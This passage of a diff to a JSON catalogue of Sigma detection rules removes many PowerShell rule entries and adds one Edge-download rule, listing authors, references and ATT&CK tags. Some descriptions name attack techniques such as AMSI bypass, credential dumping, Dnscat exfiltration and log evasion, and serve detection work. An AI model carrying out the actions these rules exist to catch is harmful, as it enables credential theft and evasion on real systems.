"attack.impact", - "attack.t1565" - ] - }, - "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", - "value": "Powershell Add Name Resolution Policy Table Rule" - }, - { - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_adrecon_execution.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "value": "PowerShell ADRecon Execution" - }, - { - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", "meta": { "author": "Florian Roth", - "creation_date": "2022/11/09", + "creation_date": "2022/01/11", "falsepositive": [ - "Unknown" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "filename": "proc_creation_win_msedge_minimized_download.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ] - }, - "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "value": "AMSI Bypass Pattern Assembly GetType" - }, - { - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "meta": { - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_apt_silence_eda.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.t1105" ] }, - "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "value": "Silence.EDA Detection" + "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", + "value": "Suspicious Minimized MSEdge Start" }, { - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "description": "Performs execution of specified file, can be used for defensive evasion.", "meta": { "author": "frack113", - "creation_date": "2022/03/17", + "creation_date": "2021/11/24", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "filename": "posh_ps_as_rep_roasting.yml", + "filename": "proc_creation_win_lolbin_bash.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", - "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "value": "Get-ADUser Enumeration Using UserAccountControl Flags" - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_automated_collection.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ] - }, - "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "value": "Automated Collection Command PowerShell" - }, - { - "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", - "meta": { - "author": "Austin Songer (@austinsonger)", - "creation_date": "2021/10/23", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_azurehound_commands.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069" - ] - }, - "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", - "value": "AzureHound PowerShell Commands" - }, - { - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_capture_screenshots.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", - "value": "Windows Screen Capture with CopyFromScreen" - }, - { - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_clearing_windows_console_history.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", - "https://www.shellhacks.com/clear-history-powershell/", - "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" - ] - }, - "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "value": "Clearing Windows Console History" - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "meta": { - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2022/01/25", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_clear_powershell_history.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", - "value": "Clear PowerShell History - PowerShell" - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_invocation_lolscript.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "value": "Execution via CL_Invocation.ps1 - Powershell" - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_invocation_lolscript_count.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", - "value": "Execution via CL_Invocation.ps1 (2 Lines)" - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "value": "Execution via CL_Mutexverifiers.ps1" - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", - "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" - }, - { - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cmdlet_scheduled_task.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "value": "Powershell Create Scheduled Task" - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/17", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "db885529-903f-4c5d-9864-28fe199e6370", - "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" - }, - { - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_copy_item_system_directory.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ] - }, - "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "value": "Powershell Install a DLL in System Directory" - }, - { - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_cor_profiler.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.012" - ] - }, - "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", - "value": "Registry-Free Process Scope COR_PROFILER" - }, - { - "description": "Detects creation of a local user via PowerShell", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/04/11", - "falsepositive": [ - "Legitimate user creation" - ], - "filename": "posh_ps_create_local_user.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" - ] - }, - "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "value": "PowerShell Create Local User" - }, - { - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_create_volume_shadow_copy.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "value": "Create Volume Shadow Copy with Powershell" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Highly likely if archive operations are done via PowerShell." - ], - "filename": "posh_ps_data_compressed.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1560" - ] - }, - "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", - "value": "Data Compressed - PowerShell" - }, - { - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "meta": { - "author": "frack113, Duc.Le-GTSC", - "creation_date": "2021/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_detect_vm_env.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", - "https://techgenix.com/malicious-powershell-scripts-evade-detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1497.001" - ] - }, - "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "value": "Powershell Detect Virtualization Environment" - }, - { - "description": "Enumerates Active Directory to determine computers that are joined to the domain", - "meta": { - "author": "frack113", - "creation_date": "2022/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_directorysearcher.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ] - }, - "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "value": "DirectorySearcher Powershell Exploitation" - }, - { - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_directoryservices_accountmanagement.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", - "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.002" - ] - }, - "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "value": "Manipulation of User Computer or Group Security Principals Across AD" - }, - { - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "meta": { - "author": "Ali Alwashali", - "creation_date": "2022/08/21", - "falsepositive": [ - "Legitimate script that disables the command history" - ], - "filename": "posh_ps_disable_psreadline_command_history.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/DissectMalware/status/1062879286749773824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", - "value": "Disable Powershell Command History" - }, - { - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_disable_windowsoptionalfeature.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "value": "Disable-WindowsOptionalFeature Command PowerShell" - }, - { - "description": "Dnscat exfiltration tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" - ], - "filename": "posh_ps_dnscat_execution.yml", - "level": "critical", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "value": "Dnscat Execution" - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "value": "Dump Credentials from Windows Credential Manager With PowerShell" - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_enable_psremoting.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "value": "Enable Windows Remote Management" - }, - { - "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_enable_windowsoptionalfeature.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "55c925c1-7195-426b-a136-a9396800e29b", - "value": "Enable-WindowsOptionalFeature Command PowerShell" - }, - { - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "603c6630-5225-49c1-8047-26c964553e0e", - "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" - }, - { - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_etw_trace_evasion.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ] - }, - "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", - "value": "Disable of ETW Trace - Powershell" - }, - { - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Legitimate usage of the cmdlet to forward emails" - ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" - }, - { - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_file_and_directory_discovery.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", - "value": "Powershell File and Directory Discovery" - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under 